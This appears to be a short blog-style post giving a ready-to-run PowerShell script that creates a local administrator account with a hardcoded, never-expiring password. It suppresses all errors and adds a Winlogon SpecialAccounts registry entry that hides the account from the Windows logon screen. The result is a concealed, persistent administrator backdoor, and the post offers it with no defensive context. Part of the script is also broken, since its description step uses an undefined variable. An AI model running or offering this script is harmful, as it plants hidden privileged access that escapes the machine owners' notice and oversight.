PowerShell – Set up Hidden-Special Account

email me

clear-host

$UserName = "TestUser"		
$Password = "LetMeIn99$"
$Description = "Test Account"


$ComputerName = $env:COMPUTERNAME

$ErrorActionPreference = "SilentlyContinue"

# Create User Account
$Computer = [ADSI]("WinNT://" + $ComputerName + ",computer")
$User = $Computer.Create("User",$UserName)

# Set Password
$User.SetPassword($Password)
$User.SetInfo()	
        
# Set PW To Never Expire
$User.PasswordExpired = 0 
$User.SetInfo()
$WMI = Get-WmiObject -class "Win32_UserAccount" -filter "name='$UserName'" 
$WMI.PasswordExpires = $false 
$WMI.Put() 
		

# Set Account Description
If($Description -gt 0)
{
	$objUser.Description = $Description
	$objUser.SetInfo()
}
		
# Add to Groups
$LocalGroup = [ADSI]"WinNT://$ComputerName/Administrators"
$UserAccount = [ADSI]"WinNT://$ComputerName/$UserName"
$LocalGroup.Add($UserAccount.Path)
$LocalGroup.SetInfo()
		
# Set SpecialAccounts Reg Key
$regPath = "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
New-Item -Path "$regPath" -Name SpecialAccounts | Out-Null
New-Item -Path "$regPath\SpecialAccounts" -Name UserList | Out-Null
New-ItemProperty -Path "$regPath\SpecialAccounts\UserList" -Name $UserName -Value 0 -PropertyType DWord | Out-Null
		
Write-Host "Done!" -ForegroundColor Green